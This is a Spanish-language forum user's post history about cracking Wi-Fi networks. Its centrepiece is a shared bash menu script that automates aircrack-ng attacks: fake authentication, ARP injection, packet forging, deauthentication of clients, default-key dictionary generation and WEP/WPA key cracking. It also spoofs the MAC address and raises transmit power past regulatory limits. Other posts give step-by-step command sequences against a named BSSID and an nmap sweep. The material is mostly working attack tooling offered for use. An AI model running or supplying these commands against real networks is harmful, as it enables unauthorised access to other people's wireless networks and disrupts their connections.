Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - RocKHounD

#42
> airplay-ng -10 -a (bssid) -h (mac) -e (essid) (tarjeta) ---> que es {wlan0}

aireplay-ng -1 6000 -o 1 -q 10 -a bssid -h mac interfaz.
#43
Hola a todos,

Hace tiempo cree el siguiente script que quiero compartir con vosotros, el codigo bueno... probablemente pueda depurarse casi en su total, aun asi funciona.
Esta creado para funcionar en BT4 con Chipset RTL.

La tercera linea del script puede modificarse para cambiarel chipset,
wlandecrypter esta implementado en el script aunque debe encontrarse en /usr/sbin.

Espero mejoras y demas.

Como comente a ChimoC he creado un blog para temas de scripting y de tecnicas de nivel medio alto en el que me gustaria que participaseis todos.

Seguire aportando aqui las cosas que me ronden la cabeza.

Un saludo,

Si no puedo poner este enlace, borrar unicamente esta parte pero no borreis mi aporte,

Gracias

http://btcode.blogspot.com


Citar
Código (bash) [Seleccionar]

#!/bin/bash
airmon-ng stop mon0 >> /dev/null
clear
RTL8187=`airmon-ng |grep "rtl" |awk '{print $1}'`
echo [*] Cambiando la region de la tarjeta...
iw reg set BO
sleep 2
echo [*] Cambiando la potencia maxima a la tarjeta
iwconfig $RTL8187 txpower 30
sleep 2
echo [*] Habilitando Modo Monitor...
sleep 2
airmon-ng start $RTL8187 >> /dev/null
echo [*] Modo Monitor Habilitado
sleep 2
echo [*] Falsficando Mac Address
sleep 2
echo [*] Mac Address Falsificada
sleep 2
echo
echo
clear

monitor=`ifconfig |grep "mon0" |awk '{print $1}'`
mimac=00:11:22:33:44:55


rm out*
rm rep*
rm *.xor
rm *.diccionario
rm *-request
rm temp*
while :
do
clear
echo
echo "1. Escanear todas las redes con cifrado WEP "
echo "2. Escanear todas las redes con cifrado WPA "
echo "3. Escanear una red en particular"
echo "4. Lanzar Airodump-ng "
echo "5. Lanzar Aireplay-ng modo Selectivo"
echo "6. Lanzar Aireplay-ng modo inyectar ARP"
echo "7. Lanzar Aireplay-ng modo asociacion falsa V1"
echo "8. Lanzar Aireplay-ng modo asociacion falsa V2"
echo "9. Lanzar Aireplay-ng modo asociacion falsa V3"
echo "10. Lanzar Aireplay-ng para obtener el  PRGA"
echo "11. Lanzar Aireplay-ng fragmentado para obtener PRGA"
echo "12. Lanzar Packetforge-ng para crear un paquete ARP"
echo "13. Lanzar Aireplay-ng para inyectar el paquete creado"
echo "14. Lanzar Aireplay-ng para realizar una denegacion "
echo "15. Crear un diccionario para redes WLAN_XX"
echo "16. Lanzar Aircrack-ng para crackear la password"
echo "17. Lanzar Aircrack-ng PTW para crackear la password"
echo "18. Lanzar Aircrack-ng para crackear una password WLAN_XX"
echo "19. Cambiar Mac Asociada"
echo "20. Probar Si la tarjeta Inyecta correctamente"
echo "21. Modificar la sensibilidad de la tarjeta"
echo "22. Salir"
echo ""
echo "Elige una opcion"
read opt

case $opt in
1) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wep -w temp &;;
2) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wpa -w temp &;;
3) cat  temp-01.csv | awk '{print $1,$20,$6}' >> temp-00001.csv;
clear;
cat temp-00001.csv;
echo "Selecciona el Bssid";
read macap;
echo "Selecciona el Essid"
read nombreap
echo "Selecciona Canal";
read canal;
killall xterm;
rm temp-*;;
4) xterm -hold -geometry 90x15+500+0 -fg yellow -bg black -title "Esnifando Paquetes" -e airodump-ng $monitor -a --bssid $macap -c $canal -w out &;;
5) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Ataque Selectivo" -e aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b $macap -h $mimac $monitor &;;
6) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Inyectando Arp" -e aireplay-ng -3 -b $macap -h $mimac $monitor &;;
7) xterm -geometry 90x15+0+0 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 0 -a $macap -h $mimac $monitor &;;
8) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 6000 -o 1 -q 10 -a $macap -h $mimac $monitor &;;
9) echo "Seleccina el numero de paquetes para la autenticacion";
read num;
xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap con $num paquetes" -e aireplay-ng -1 0 -a $macap -h $mimac -o $num $monitor &;;
10) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -4 -b $macap -h $mimac $monitor &;;
11) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -5 -b $macap -h $mimac $monitor &;;
12) packetforge-ng -0 -a $macap -h $mimac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request &;;
13) xterm -geometry 90x15+500+400 -fg yellow -bg black -hold -title "Inyectando Paquete especial" -e aireplay-ng -2 -r arp-request -h $mimac $monitor &;;
14) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Deautenticando a $mimac" -e aireplay-ng -0 1 -a $macap -c $mimac $monitor &;;
15) xterm -e wlandecrypter $macap $nombreap $nombreap.diccionario;;
16) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap;;
17) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 -P 2 *.cap;;
18) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap -w $nombreap.diccionario;;
19) echo "Escribe la nueva Mac Asociada";
read mimac;;
20) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Probando Inyeccion" -e aireplay-ng -9 -a $macap -e $nombreap $monitor &;;
21) echo "Selecciona la sensibilidad";
echo "1M Mayor sensibilidad o 54M Mayor alcance";
read sens;
iwconfig $monitor rate $sens;;
22) exit 1;;
*) echo "la opcion $opt no es valida, usa una entre 1 - 22";
echo "Presiona enter para continuar"
read enterKey;;
esac
done

#44
Haz un mapeo de red.

Citarnmap -p 80 192.168.1.0/24

Y omite tu ip en el resultado, es posible que en el router lo que veas sean las concesiones dhcp que se han dado, ahi te dira cuando expiraron, con WPA no entran.
#45
Investiga sobre Rainbow tables...

el objetivo es encontrar el algoritmo de las redes actuales no de encontrar "Cigarro" como clave WPA, saludos.
#46
Primero logueate como root para evitar "sudo"

Citarifconfig wlan0 down

Citarairmon-ng start wlan0 9
(canal que quieres fijar)

Citarkillall -9 NetworkManager avahi-daemon wpa_supplicant dhclient

Citarifconfig mon0 down

Citarmacchanger -m 00:11:22:33:44:55 mon0

Citarairodump-ng mon0
(No tienes que levantar la interfaz para que funcione.)

Citarairodump-ng -c 9 -w WLAN_E --bssid  00:13:49:87:F3:23 mon0
(Nota: 00:XX:XX:XX:XX:XX = 00:02:CF:A0:53:16 (Probablemente))

Citaraireplay-ng -1 5 -q 10 -a 00:13:49:87:F3:23 -h 00:11:22:33:44:55 mon0